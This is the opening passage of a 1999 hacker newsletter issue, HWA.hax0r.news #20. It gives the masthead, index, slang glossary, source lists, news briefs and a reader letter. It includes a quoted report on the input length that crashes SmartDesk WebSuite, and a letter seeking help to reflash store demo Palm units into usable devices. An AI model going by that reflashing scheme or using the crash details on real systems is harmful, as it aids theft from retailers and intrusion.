[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                       <=-[ HWA.hax0r.news ]-=>                         =
==========================================================================
               [=HWA'99=] Number 20 Volume 1 1999 May 29th 99
==========================================================================
        [ 61:20:6B:69:64:20:63:6F:75:                                  ]
        [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73:                      ]
        [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!                     ]
==========================================================================

     "There are two major products that come out of Berkeley: LSD and
      UNIX. We don't believe this to be a coincidence."
                                                   -Jeremy S. Anderson

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and
www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and
airportman for the Cubesoft bandwidth. Also shouts out to all our mirror
sites! tnx guys.

     http://www.csoft.net/~hwa
     http://www.digitalgeeks.com/hwa

Synopsis
---------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news and
anything else I think is worthy of a look see. (remember i'm doing this for
me, not you, the fact some people happen to get a kick/use out of it is of
secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the likes
of publications such as CuD or PHRACK or with news sites such as AntiOnline,
the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor
could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many sources
as possible and providing links to further info, it's a labour of love and
will be continued for as long as I feel like it, i'm not motivated by
dollars or the illusion of fame, did you ever notice how the most
famous/infamous hackers are the ones that get caught? there's a lot to be
said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
                    Welcome to HWA.hax0r.news ... #20
=-----------------------------------------------------------------------=

     "It is possible to provide security against other ills, but as far
      as death is concerned, we men live in a city without walls."
                                                             -Epicurus

We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop by and
idle a while and say hi...

 *******************************************************************
 ***  /join #HWA.hax0r.news on EFnet the key is `zwen'           ***
 ***                                                             ***
 ***  please join to discuss or impart news on techno/phac scene ***
 ***  stuff or just to hang out ... someone is usually around 24/7***
 ***                                                             ***
 ***  Note that the channel isn't there to entertain you its for ***
 ***  you to talk to us and impart news, if you're looking for fun***
 ***  then do NOT join our channel try #weirdwigs or something... ***
 ***  we're not #chatzone or #hack                               ***
 ***                                                             ***
 *******************************************************************

=-------------------------------------------------------------------------=
                               Issue #20
=--------------------------------------------------------------------------=

     "Wars have never hurt anybody except the people who die."
                                                       -Salvador Dali

                             [ INDEX ]
=--------------------------------------------------------------------------=
 Key     Content
=--------------------------------------------------------------------------=

 00.0 ..
         COPYRIGHTS ......................................................
 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
 00.2 .. SOURCES .........................................................
 00.3 .. THIS IS WHO WE ARE ..............................................
 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
 00.5 .. THE HWA_FAQ V1.0 ................................................
 01.0 .. GREETS ..........................................................
 01.1 .. Last minute stuff, rumours, newsbytes ...........................
 01.2 .. Mailbag .........................................................
 02.0 .. From the Editor..................................................
 03.0 .. Clinton Authorizes Cyber Attack??? ..............................
 03.1 .. More on the 'Cyberwar'...........................................
 04.0 .. RootFest Scares Officials In Minneapolis ........................
 05.0 .. Australia Admits to Echelon .....................................
 06.0 .. Banks to Test Home User PC Security .............................
 07.0 .. EMPEROR VIRUS....................................................
 08.0 .. WINHLP32.EXE BUFFER OVERRUN......................................
 09.0 .. NAI ON GALADRIEL VIRUS...........................................
 10.0 .. Know your enemy parts 1,2 and 3..................................
 11.0 .. Cox Report Blasts DOE Computer Security .........................
 12.0 .. Black Hat Briefings Announced ...................................
 13.0 .. eEYe Digital Security advisory: Multiple Web Interface Security Holes
 14.0 .. Fun with ICQ.....................................................
 15.0 .. FBI raids suspected hackers......................................
 15.1 .. Real life hacker wargames........................................
 16.0 .. MOD hacks Senate site............................................
 17.0 .. Backdoor-G a new 'backorifice like' trojan and BO2K..............
 18.0 .. [CNN] A Q&A with Emmanuel Goldstein, editor of 2600 magazine.....
 19.0 .. [CNN] 'Hacking is a felony': Q&A with IBM's Charles Palmer.......
 20.0 .. Five Busted in Florida ..........................................
 21.0 .. Danes Finger Swede for Cracking 12,000 Systems ..................
 22.0 .. EFA Plans Net Censorship Demonstrations..........................
 23.0 .. Design Principles for Tamper-Resistant Smart Card Processors.....
 24.0 .. Melissa finds a mate.............................................
 25.0 .. punkz.com sets up a page for feedback on the presidential cyberwar
 26.0 .. Its that time of month again, when the 26th rolls around, look out
 27.0 .. Submission: "Be A Nice Hacker" by System.........................
 28.0 .. Hacking Memes by Stephen Downes..................................
 29.0 .. [ISN] House panel aims to bolster security law...................
 30.0 .. [ISN] NSA Taps Universities For Info Security Studies............
 31.0 .. [ISN] HushMail: free Web-based email with bulletproof encryption.
 32.0 .. [ISN] E-Biz Bucks Lost Under SSL Strain..........................
 33.0 .. [ISN] Bracing for guerrilla warfare in cyberspace................
 34.0 .. [ISN] Prosecuting Lee Is Problematic.............................
 35.0 .. [ISN] Slip of the Tongue Lightens up Encryption Hearing .........
 36.0 .. [ISN] REVIEW: "Microsoft Windows NT 4.0 Security, Audit, and Control",
 37.0 .. [ISN] LCI Intros SMARTpen Biometric Signature Authentication.....
 38.0 .. [ISN] CFP: DISC 99 Computer Security 99..........................
 39.0 .. [ISN] GAO: NASA systems full of holes............................
 39.1 .. [ISN] Nasa vulnerabilities potentially deadly....................
 40.0 .. Citrix Winframe client for Linux vulnerability...................
 41.0 .. [ISN] Top 10 candidates for a "duh" list (general sec/crypto)....
 42.0 .. Seeing invisible fields and avoiding them...the MicroAlarm.......
 43.0 .. RelayCheck v1.0 scan for smtp servers that will relay mail.......
 44.0 .. Admintool exploit for Solaris (Updated) by Shadow Penguin Security
 45.0 .. AppManager 2.0 for NT from NetIQ displays passwords in cleartext
 46.0 .. Cgichck99 ported to Rebol from Su1d Sh3ll's .c code..............
 47.0 .. ICSA certifies weak crypto as secure.............................
 48.0 .. RAS and RRAS vulnerability.......................................
 49.0 .. Whitepaper: The Unforeseen Consequences of Login Scripts By Dan Kaminsky
 50.0 .. Vulnerability in pop2.imap.......................................
 51.0 .. Infosec.19990526.compaq-im.a 'Compaq insight manager vulnerability'
 52.0 .. Advisory: NT ODBC Remote Compromise...............................
 53.0 .. Advisory: Buffer overflow in SmartDesk WebSuite v2.1..............
 54.0 .. Security Leak with IBM Netfinity Remote Control Software..........
 55.0 .. IBM eNetwork Firewall for AIX ....................................

=--------------------------------------------------------------------------=

 AD.S   .. Post your site ads or etc here, if you can offer something in
           return thats tres cool, if not we'll consider ur ad anyways so
           send it in. ads for other zines are ok too btw just mention us
           in yours, please remember to include links and an email contact.
           Corporate ads will be considered also and if your company wishes
           to donate to or participate in the upcoming Canc0n99 event send
           in your suggestions and ads now...n.b date and time may be
           pushed back join mailing list for up to date information.......
           Current dates: Aug19th-22nd Niagara Falls... .................

 HA.HA  .. Humour and puzzles ............................................
           Hey You!........................................................
           =------=........................................................
           Send in humour for this section! I need a laugh and its hard to
           find good stuff... ;)...........................................

 SITE.1 ..
           Featured site, .................................................
 H.W    .. Hacked Websites ...............................................
 A.0    .. APPENDICES......................................................
 A.1    .. PHACVW linx and references......................................

=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS
     OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE
     RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
     IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS
     (SEE FAQ).

     Important semi-legalese and license to redistribute:

     YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE
     GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS
     Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S
     ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
     http://welcome.to/HWA.hax0r.news
     IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY
     NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME
     PRIVATELY current email cruciphux@dok.org

     THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS
     ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT
     AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

     I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
     REDISTRIBUTE/MIRROR. - EoD

     Although this file and all future issues are now copyright, some of
     the content holds its own copyright and these are printed and
     respected. News is news so i'll print any and all news but will quote
     sources when the source is known, if its good enough for CNN its good
     enough for me. And i'm doing it for free on my own time so pfffft. :)

     No monies are made or sought through the distribution of this
     material. If you have a problem or concern email me and we'll discuss
     it.

     cruciphux@dok.org

     Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
     Canada / North America (hell even if you are inside ..) and wish to
     send printed matter like newspaper clippings a subscription to your
     cool foreign hacking zine or photos, small non-explosive packages or
     sensitive information etc etc well, now you can. (w00t) please no
     more inflatable sheep or plastic dog droppings, or fake vomit thanks.

     Send all goodies to:

                   HWA NEWS
                   P.O BOX 44118
                   370 MAIN ST. NORTH
                   BRAMPTON, ONTARIO
                   CANADA
                   L6V 4H5

     WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of
     ~~~~~~~  you are reading this from some interesting places, make my
     day and get a mention in the zine, send in a postcard, I realize that
     some places it is cost prohibitive but if you have the time and money
     be a cool dude / gal and send a poor guy a postcard preferably one
     that has some scenery from your place of residence for my collection,
     I collect stamps too so you kill two birds with one stone by being
     cool and mailing in a postcard, return address not necessary, just a
     "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx.

     Ideas for interesting 'stuff' to send in apart from news:

     - Photo copies of old system manual front pages (optionally signed by
       you) ;-)
     - Photos of yourself, your mom, sister, dog and or cat in a NON
       compromising position plz I don't want pr0n.
     - Picture postcards
     - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
       tapes with hack/security related archives, logs, irc logs etc on em.
     - audio or video cassettes of yourself/others etc of interesting phone
       fun or social engineering examples or transcripts thereof.
     If you still can't think of anything you're probably not that
     interesting a person after all so don't worry about it

     Our current email:

     Submissions/zine gossip.....: hwa@press.usmc.net
     Private email to editor.....: cruciphux@dok.org
     Distribution/Website........: sas72@usa.net

@HWA

00.2 Sources ***
     ~~~~~~~~~~~

     Sources can be some, all, or none of the following (by no means
     complete nor listed in any degree of importance) Unless otherwise
     noted, like msgs from lists or news from other sites, articles and
     information is compiled and or sourced by Cruciphux no copyright
     claimed.

     News & I/O zine ................. http://www.antionline.com/
     Back Orifice/cDc..................http://www.cultdeadcow.com/
     News site (HNN) ..................http://www.hackernews.com/
     Help Net Security.................http://net-security.org/
     News,Advisories,++ ...............http://www.l0pht.com/
     NewsTrolls .......................http://www.newstrolls.com/
     News + Exploit archive ...........http://www.rootshell.com/beta/news.html
     CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
     News site+........................http://www.zdnet.com/
     News site+Security................http://www.gammaforce.org/
     News site+Security................http://www.projectgamma.com/
     News site+Security................http://securityhole.8m.com/
     News site+Security related site...http://www.403-security.org/
     News/Humour site+ ................http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
     Link ............................ http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
     Link ............................ http://www.ottawacitizen.com/business/
     Link ............................ http://search.yahoo.com.sg/search/news_sg?p=hack
     Link ............................ http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
     Link ............................ http://www.zdnet.com/zdtv/cybercrime/
     Link ............................ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

     NOTE: See appendices for details on other links.

     http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
     http://freespeech.org/eua/ ........ Electronic Underground Affiliation
     http://ech0.cjb.net ............... ech0 Security
     http://axon.jccc.net/hir/ ......... Hackers Information Report
     http://net-security.org ........... Net Security
     http://www.403-security.org ....... Daily news and security related site

     Submissions/Hints/Tips/Etc
     ~~~~~~~~~~~~~~~~~~~~~~~~~~

     All submissions that are `published' are printed with the credits
     you provide, if no response is received by a week or two it is
     assumed that you don't care whether the article/email is to be used
     in an issue or not and may be used at my discretion.

     Looking for:

     Good news sites that are not already listed here OR on the HNN
     affiliates page at http://www.hackernews.com/affiliates.html

     Magazines (complete or just the articles) of breaking sekurity or
     hacker activity in your region, this includes telephone phraud and
     any other technological use, abuse hole or cool thingy. ;-) cut em
     out and send it to the drop box.

     - Ed

     Mailing List Subscription Info   (Far from complete)   Feb 1999
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~   ~~~~~~~~

     ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

     THE MOST READ:

     BUGTRAQ - Subscription info
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

     What is Bugtraq?

     Bugtraq is a full-disclosure UNIX security mailing list, (see the info
     file) started by Scott Chasin. To subscribe to bugtraq, send mail to
     listserv@netspace.org containing the message body subscribe bugtraq.
     I've been archiving this list on the web since late 1993. It is
     searchable with glimpse and archived on-the-fly with hypermail.

     Searchable Hypermail Index;

     http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

     About the Bugtraq mailing list
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     The following comes from Bugtraq's info file:

     This list is for *detailed* discussion of UNIX security holes: what
     they are, how to exploit, and what to do to fix them.

     This list is not intended to be about cracking systems or exploiting
     their vulnerabilities. It is about defining, recognizing, and
     preventing use of security holes and risks.

     Please refrain from posting one-line messages or messages that do not
     contain any substance that can relate to this list`s charter.

     I will allow certain informational posts regarding updates to security
     tools, documents, etc. But I will not tolerate any unnecessary or
     nonessential "noise" on this list.

     Please follow the below guidelines on what kind of information should
     be posted to the Bugtraq list:

     + Information on Unix related security holes/backdoors (past and
       present)
     + Exploit programs, scripts or detailed processes about the above
     + Patches, workarounds, fixes
     + Announcements, advisories or warnings
     + Ideas, future plans or current works dealing with Unix security
     + Information material regarding vendor contacts and procedures
     + Individual experiences in dealing with above vendors or security
       organizations
     + Incident advisories or informational reporting

     Any non-essential replies should not be directed to the list but to
     the originator of the message. Please do not "CC" the bugtraq
     reflector address if the response does not meet the above criteria.

     Remember: YOYOW. You own your own words. This means that you are
     responsible for the words that you post on this list and that
     reproduction of those words without your permission in any medium
     outside the distribution of this list may be challenged by you, the
     author.

     For questions or comments, please mail me:
     chasin@crimelab.com (Scott Chasin)

     Crypto-Gram
     ~~~~~~~~~~~

     CRYPTO-GRAM is a free monthly newsletter providing summaries,
     analyses, insights, and commentaries on cryptography and computer
     security. To subscribe, visit http://www.counterpane.com/crypto-gram.html
     or send a blank message to crypto-gram-subscribe@chaparraltree.com.
     To unsubscribe, visit http://www.counterpane.com/unsubform.html.
     Back issues are available on http://www.counterpane.com.

     CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
     Counterpane Systems, the author of "Applied Cryptography," and an
     inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on
     the board of the International Association for Cryptologic Research,
     EPIC, and VTW. He is a frequent writer and lecturer on cryptography.

     CUD Computer Underground Digest
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     This info directly from their latest ish:

     Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                                    ISSN  1004-042X

        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
        Archivist: Brendan Kehoe
        Poof Reader:   Etaion Shrdlu, Jr.
        Shadow-Archivists: Dan Carosone / Paul Southworth
                           Ralph Sims / Jyrki Kuoppala
                           Ian Dickinson
        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

     [ISN] Security list
     ~~~~~~~~~~~~~~~~~~~

     This is a low volume list with lots of informative articles, if I had
     my way i'd reproduce them ALL here, well almost all .... ;-) - Ed

     Subscribe: mail majordomo@repsec.com with "subscribe isn".

@HWA

00.3 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~

     Some HWA members and Legacy staff
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     cruciphux@dok.org.........: currently active/editorial
     darkshadez@ThePentagon.com: currently active/man in black
     fprophet@dok.org..........: currently active/IRC+ man in black
     sas72@usa.net ............: currently active/IRC+ distribution
     vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
     dicentra...(email withheld): IRC+ grrl in black

     Foreign Correspondents/affiliate members
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     N0Portz ..........................: Australia
     Qubik ............................: United Kingdom
     system error .....................: Indonesia
     Wile (wile coyote) ...............: Japan/the East
     Ruffneck ........................: Netherlands/Holland

     And unofficially yet contributing too much to ignore ;)

     Spikeman .........................: World media

     Please send in your sites for inclusion here if you haven't already
     also if you want your emails listed send me a note ... - Ed

     http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
     http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

     *******************************************************************
     ***  /join #HWA.hax0r.news on EFnet the key is `zwen'           ***
     *******************************************************************

     :-p

     1. We do NOT work for the government in any shape or form.Unless you
        count paying taxes ... in which case we work for the gov't in a
        BIG WAY. :-/

     2. MOSTLY Unchanged since issue #1, although issues are a digest of
        recent news events its a good idea to check out issue #1 at least
        and possibly also the Xmas issue for a good feel of what we're all
        about otherwise enjoy - Ed ...

@HWA

00.4 Whats in a name? why HWA.hax0r.news??
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pigeonholed with those 'dumb leet
     (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's
     HACKERS anymore. BTW to all you up and comers, i'd highly recommend
     you get that book.
     Its almost like buying a clue. Anyway..on with the show ..

     - Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Also released in issue #3. (revised) check that issue for the faq it
     won't be reprinted unless changed in a big way with the exception of
     the following excerpt from the FAQ, included to assist first time
     readers:

     Some of the stuff related to personal usage and use in this zine are
     listed below: Some are very useful, others attempt to deny any
     possible attempts at eschewing obfuscation by obscuring their actual
     definitions.

     @HWA     - see EoA ;-)

     !=       - Mathematical notation "is not equal to" or "does not equal"
                ASC(247) "wavey equals" sign means "almost equal" to. If
                written an =/= (equals sign with a slash thru it) also
                means !=, =< is Equal to or less than and => is equal to or
                greater than (etc, this aint fucking grade school, cripes,
                don't believe I just typed all that..)

     AAM      - Ask a minor (someone under age of adulthood, usually <16,
                <18 or <21)

     AOL      - A great deal of people that got ripped off for net access
                by a huge clueless isp with sekurity that you can drive
                buses through, we're not talking Kung-Fu being none too
                good here, Buy-A-Kloo maybe at the least they could try
                leasing one??

     *CC      - 1 - Credit Card (as in phraud)
                2 - .cc is COCOS (Keeling) ISLANDS but they probably
                    accept cc's

     CCC      - Chaos Computer Club (Germany)

     *CON     - Conference, a place hackers crackers and hax0rs among
                others go to swap ideas, get drunk, swap new mad inphoz,
                get drunk, swap gear, get drunk watch videos and seminars,
                get drunk, listen to speakers, and last but not least, get
                drunk.

     *CRACKER - 1 . Someone who cracks games, encryption or codes, in
                    popular hacker speak he's the guy that breaks into
                    systems and is often (but by no means always) a
                    "script kiddie" see pheer
                2 . An edible biscuit usually crappy tasting without a
                    nice dip, I like jalapeno pepper dip or chives sour
                    cream and onion, yum - Ed

     Ebonics  - speaking like a rastafarian or hip dude of colour also
                wigger Vanilla Ice is a wigger, The Beastie Boys and
                rappers speak using ebonics, speaking in a dark tongue ...
                being ereet, see pheer

     EoC      - End of Commentary

     EoA      - End of Article or more commonly @HWA

     EoF      - End of file

     EoD      - End of diatribe (AOL'ers: look it up)

     FUD      - Coined by Unknown and made famous by HNN - "Fear
                uncertainty and doubt", usually in general media articles
                not high brow articles such as ours or other HNN
                affiliates ;)

     du0d     - a small furry animal that scurries over keyboards causing
                people to type weird crap on irc, hence when someone says
                something stupid or off topic 'du0d wtf are you talkin
                about' may be used.

     *HACKER  - Read Stephen Levy's HACKERS for the true definition, then
                see HAX0R

     *HAX0R   - 1 - Cracker, hacker wannabe, in some cases a true hacker,
                    this is difficult to define, I think it is best
                    defined as pop culture's view on The Hacker ala movies
                    such as well erhm "Hackers" and The Net etc... usually
                    used by "real" hackers or crackers in a derogatory or
                    slang humorous way, like 'hax0r me some coffee?' or
                    can you hax0r some bread on the way to the table
                    please?'
                2 - A tool for cutting sheet metal.

     HHN      - Maybe a bit confusing with HNN but we did spring to life
                around the same time too, HWA Hax0r News.... HHN is a part
                of HNN .. and HNN as a proper noun means the hackernews
                site proper. k? k. ;)

     HNN      - Hacker News Network and its affiliates
                http://www.hackernews.com/affiliates.html

     J00      - "you"(as in j00 are OWN3D du0d) - see 0wn3d

     MFI/MOI  - Missing on/from IRC

     NFC      - Depends on context: No Further Comment or No Fucking
                Comment

     NFR      - Network Flight Recorder (Do a websearch) see 0wn3d

     NFW      - No fuckin'way

     *0WN3D   - You are cracked and owned by an elite entity see pheer

     *OFCS    - Oh for christ's sakes

     PHACV    - And variations of same Phreaking, Hacking, Anarchy,
                Cracking, Carding (CC) Groups Virus, Warfare

                Alternates: H - hacking, hacktivist
                            C - Cracking
                            C - Cracking
                            V - Virus
                            W - Warfare
                            A - Anarchy (explosives etc, Jolly Roger's
                                Cookbook etc)
                            P - Phreaking, "telephone hacking" PHone
                                fREAKs ...
                            CT - Cyber Terrorism

     *PHEER   - This is what you do when an ereet or elite person is in
                your presence see 0wn3d

     *RTFM    - Read the fucking manual - not always applicable since some
                manuals are pure shit but if the answer you seek is indeed
                in the manual then you should have RTFM you dumb ass.

     TBC      - To Be Continued also 2bc (usually followed by ellipses...)
                :^0

     TBA      - To Be Arranged/To Be Announced also 2ba

     TFS      - Tough fucking shit.

     *w00t    - 1 - Reserved for the uber ereet, noone can say this
                    without severe repercussions from the underground
                    masses. also "w00ten"
                2 - Cruciphux and sAs72's second favourite word (they're
                    both shit stirrers)

     *wtf     - what the fuck

     *ZEN     - The state you reach when you *think* you know everything
                (but really don't) usually shortly after reaching the ZEN
                like state something will break that you just 'fixed' or
                tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, whats good, what
     sucks etc, not that I guarantee i'll take any notice mind you, but
     send in your thoughts anyway.
     * all the people who sent in cool emails and support

     FProphet       Pyra         TwstdPair     _NeM_
     D----Y         Kevin Mitnick (watch yer back)
     Dicentra       vexxation    sAs72         Spikeman
     Astral         p0lix        Vexx          g0at security

     Shouts to tekz from HK for asking nicely in eye-are-see! ;-) and to
     t4ck for making my night albeit I couldn't stick around for the rest
     of the comedy routine. hacked star dot star with phf huh? .... ;-))

     and the #innerpulse, crew and some inhabitants of #leetchans ....
     although I use the term 'leet loosely these days, ;)

     kewl sites:

     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://www.freekevin.com/
     + http://www.genocide2600.com/
     + http://www.genocide2600.com/~spikeman/
     + http://www.genocide2600.com/~tattooman/
     + http://www.hackernews.com/ (Went online same time we started issue 1!)
     + http://www.net-security.org/
     + http://www.slashdot.org/
     + http://www.freshmeat.net/
     + http://www.403-security.org/
     + http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     "What is popular isn't always right, and what is right isn't always
      popular..."
                                                         - FProphet '99

     +++ When was the last time you backed up your important data?

     ++ THE FIRST TRUE CYPHERPUNK NOVEL (CULT. 3:00 am)
        http://www.wired.com/news/news/email/explode-infobeat/culture/story/19720.html

        Two generations of swashbuckling geeks tackle the forces of evil.
        Call it hip, call it funny. But you can't call it light summer
        reading. Declan McCullagh reviews Neal Stephenson's Cryptonomicon.

        (checkout www.cryptonomicon.com also - Ed)

     ++ STUDENTS ARRESTED

        From HNS http://www.net-security.org/
        by BHZ, Friday 28th May 1999 on 12.02 am CET

        Five Flagler Palm Coast High School students - one the son of a
        Bunnell city commissioner - are facing a litany of criminal
        charges after authorities said they used a computer trojan to
        hack into the school's network and commandeer teacher and student
        files. Flagler County sheriff's deputies arrested the students
        Monday. All five were taken to the Division of Youth Services in
        Daytona Beach before being released to their parents.

     ++ FIGHT THE CENSORSHIP

        From HNS http://www.net-security.org/
        by BHZ, Thursday 27th May 1999 on 9.53 pm CET

        Yesterday, the Australian Senate passed legislation to censor the
        Internet. In order to protest censorship people will join with
        like minded groups and individuals in a day of action against
        censorship. Download flyers here and sure do visit Electronic
        Frontiers Australia site.

        http://www.anatomy.usyd.edu.au/danny/freedom/march/
        http://www.efa.org.au

     ++ SMARTDESK WEBSUITE BUFFER OVERFLOW

        From HNS http://www.net-security.org/
        by BHZ, Thursday 27th May 1999 on 9.47 pm CET

        As posted on BugTraq by cmart: "WebSuite v2.1 will crash when an
        additional 250+ characters is appended after the sites URL on NT
        Server 4 and NT Workstation 4 boxes. Running on top of Windows 98
        it will crash with 150+ characters appended after the sites URL.
        After reinstalling on both platforms several times, the overflow
        string length varied. Approximately 1 out of 8 times the overflow
        string went from 150 chars (Win98) to about 1000+ chars. It also
        went from 250+ chars (NT) to about 2000+ chars".

     ++ GETTING ZAPPED FOR BETTER Z'S (TECH. 3:00 am)
        http://www.wired.com/news/news/email/explode-infobeat/technology/story/19713.html

        Relief is on the way for chronic snorers and their partners. A new
        therapy uses radio waves to treat the breathing disorder known as
        sleep apnea. By Kristen Philipkoski

     Mucho thanks to Spikeman for directing his efforts to our cause of
     bringing you the news we want to read about in a timely manner ... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Hacking the Palm Pilot demos...
Date: Thu, 20 May 1999 23:56:05 -0400
From: scosha@home.com
Organization: @Home Network
X-Mailer: Mozilla 4.51 [en]C-AtHome0404 (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: hwa@press.usmc.net
Subject: subject for newsletter
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

As we all know 3Com has recently released the Palm IIIx and V. The Palm V demo in store displays is a dummy unit with a hunk of lead inside. On the other hand the Palm IIIx is a fully working unit. There is a trick to make it work 100%.

Like its predecessor the Palm III, the demo, if you could get your hands on one, was not hard to reflash the OS ROM and presto you had a Palm III worth $500.00 and there was little effort involved. The IIIx poses a little more difficulty. They have employed a new strategy. 1st 3Com went with the new Ezball Motorola Dragon processor, and put the OS in static non-volatile memory. While it's not hard to download a fresh copy of the OS from a real store bought IIIx, the trick is in flashing the demo unit. The programs used to flash the III do not work on the IIIx, all you will get is a 'wrong header card version' message, which basically seals your fate.

I have been working on trying to flash the proper OS replacing the demo OS (which won't allow you to input anything) to no avail. I put it out to the people who do these things best. I know not what to do from here. I have a few insiders helping but it is a much kept secret.

zzcrazyman

================================================================

@HWA

02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>

int main(void)
{
    printf ("Read commented source!\n\n");

    /*
     * Well things are moving along rather smoothly, its been a comparatively
     * slow (but interesting) week on the news front with some FBI action coming
     * down on people and shit, not a good time for hacker groups right now as
     * it looks like the crackdown is only going to get worse in the future.
     *
     * Anyway, drop into #hwa.hax0r.news the key is usually off and we're a
     * friendly bunch, stop by and chat about some of the stories here or that
     * you've seen elsewhere, other than that take it easy til next time...
     *
     * Here's #20, have at it...
     */

    printf ("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main address:
hwa@press.usmc.net
complaints and all nastygrams and mailbombs can go to /dev/null
nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

@HWA

03.0 Clinton Authorizes Cyber Attack???
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/
contributed by Sangfroid
